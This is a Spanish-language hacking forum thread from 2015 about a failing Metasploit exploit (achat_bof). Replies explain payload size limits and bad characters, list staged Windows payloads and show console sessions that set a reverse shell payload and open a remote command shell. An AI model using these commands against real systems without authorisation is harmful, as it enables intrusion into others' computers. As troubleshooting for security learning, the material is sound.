comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ayuda con exploit de metasploit!!!!

  • 6 Respuestas
  • 1983 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Septiembre 30, 2015, 01:44:45 am »
Ayuda! Tengo un host windows 7 vulnerable con su exploit (achat_bof), cuando lo ejecuto me dá el siguiente error,

msf exploit(achat_bof) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

alguién pude ayudarme y explicarme a que se debe! ??

Muchas gracias!
« Última modificación: Septiembre 30, 2015, 02:18:39 am por Gabriela »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5391
  • Actividad:
    38.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Septiembre 30, 2015, 08:33:26 am »
Los payloads disponibles (show payloads) son determinados por el espacio de memoria disponible ('Space') para el exploit a usar. En el ejemplo, el espacio para el payload es: 'Space: 200'. Sin embargo, la aplicación objetivo no permite que ciertos caracteres sean usados (generalmente el carácter nulo 0x00 ya que marca el fin de una cadena [character array]). En el ejemplo el payload no permite cinco caracteres: 'Avoid: 5 characters '

Cuando ejecuta el exploit, el generador del payload intentara meter el payload en un espacio de 200, excluyendo 5 caracteres específicos. Esto no siempre es posible, y dará lugar al error: No encoders encoded the buffer successfully.

Sin embargo, no todo está perdido. Metasploit Framework incluye la capacidad de apoyar payloads organizadamente. Un payload organizado es un payload significativamente más pequeño que, en vez de ejecutar la acción deseada (tal como reverse shell), comenzará una plataforma de organizar que pueda entonces agregar a esa plataforma. Entonces en nuestro ejemplo, en vez de una reverse shell completa, lo hará asi:

1    Crear la plataforma de organizar.
2    Asignar bastante memoria para sostener el payload deseado.
3    Obtener el resto del payload de usted.
4    Ejecutar el payload en total.

Generalmente, todos los exploit organizados son denotados por '/' después del payload deseado. Algunos ejemplos son:

Código: Text
  1.    windows/dllinject/reverse_tcp          Windows Inject DLL, Reverse TCP Stager                                                      
  2.    windows/download_exec/bind_tcp         Windows Executable Download and Execute, Bind TCP Stager                                                                    
  3.    windows/exec/find_tag                  Windows Execute Command, Find Tag Ordinal Stager                                                      
  4.    windows/meterpreter/reverse_tcp        Windows Meterpreter, Reverse TCP Stager                              
  5.    windows/shell/reverse_tcp              Windows Command Shell, Reverse TCP Stager                                                    
  6.    windows/upexec/bind_tcp                Windows Upload/Execute, Bind TCP Stager                          
  7.    windows/vncinject/reverse_ord_tcp      Windows VNC Inject, Reverse Ordinal TCP Stager              
  8.  

Ahora que sabemos que no siempre se puede ejecutar un payload 'Íntegro', podemos usar uno organizado en esos casos:

Código: Text
  1. msf exploit(ccproxy_telnet_ping) > exploit
  2. [-] Exploit failed: No encoders encoded the buffer successfully.
  3. msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
  4. PAYLOAD => windows/shell/reverse_tcp
  5. msf exploit(ccproxy_telnet_ping) > exploit
  6. [*] Started reverse handler
  7. [*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
  8. [*] Sending stage (474 bytes)
  9. [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)
  10.  
  11. Microsoft Windows 2000 [Version 5.00.2195]
  12. (C) Copyright 1985-2000 Microsoft Corp.
  13.  
  14. C:\Documents and Settings\Administrator>

Espero que te sirva!
Saludos!
ANTRAX


Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Septiembre 30, 2015, 02:23:07 pm »
Probé con diferentes PAYLOADs y persiste el error:

msf > use exploit/windows/misc/achat_bof
msf exploit(achat_bof) > set lhost 192.168.0.136
lhost => 192.168.0.136
msf exploit(achat_bof) > set RHOST 192.168.0.156
RHOST => 192.168.0.156
msf exploit(achat_bof) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(achat_bof) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(achat_bof) >



Alguna sugerencia?

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Septiembre 30, 2015, 04:05:53 pm »
Haz uso de algun encoder sobre el payload.

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado RxB

  • *
  • Underc0der
  • Mensajes: 20
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Septiembre 30, 2015, 05:25:11 pm »
Perdón por mi ignorancia, pero para hacer uso de algún encoder en el exploit citado, tengo que editar el código del exploit? Podrías orientarme un poco?

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #5 en: Septiembre 30, 2015, 09:17:33 pm »
Me autocorrijo pense que andabas haciendo un bypass de algun av xDD error mio!!!!

Mira esto: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Con ello saldras totalmente de dudas.

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado .:UND3R:.

  • *
  • Underc0der
  • Mensajes: 226
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Octubre 01, 2015, 04:05:45 pm »
Está más que claro el error (por lo menos para alguien que sabe algo de exploit y no está como un simio copiando y pegando comandos sin entender que hay detrás), el payload que está enviando el exploit contiene caracteres que impiden (cortan)  el correcto funcionamiento del exploit, un caso común por ejemplo es cuando el payload contiene bytes 0x00, si el exploit abusara de la API strCpy() o similares, el exploit no alcanzaría a copiarse completamente en la memoria del SO a vulnerar, no podría ejecutarse el fallo de seguridad, por lo cual el fallo de seguridad no tendría éxito, aun así el exploit debe tener un mecanismo de seguridad por lo cual antes de enviar el exploit este verifica los caracteres (valores hexadecimales enviados en el Payload).

Saludos y por favor si vas a copiar cosas, mejor dedícate a ser mimo de calle o algo así, por que así como vas, no podrás ser nunca alguien "diferente" pues lo más lejos que llegarás será a la copia exacta de otra persona.

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 3408
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon
"ayuda con fruitywifi-karma" no puedo activar el modulo karma.

Iniciado por cristobal92

Respuestas: 4
Vistas: 1223
Último mensaje Agosto 02, 2016, 12:03:45 pm
por cristobal92
[JAVA] Ayuda Sockets en Java

Iniciado por FERNANDX

Respuestas: 1
Vistas: 500
Último mensaje Abril 25, 2018, 08:49:50 pm
por Mortal_Poison
[Ayuda] Crear .zip o .rar de un "archivo"

Iniciado por Zentraedi

Respuestas: 5
Vistas: 1392
Último mensaje Marzo 03, 2017, 02:15:20 pm
por Zentraedi
[SOLUCIONADO] Ayuda Contraseña "Sqlmap"

Iniciado por djtrueno

Respuestas: 1
Vistas: 1282
Último mensaje Enero 17, 2014, 06:07:37 pm
por ANTRAX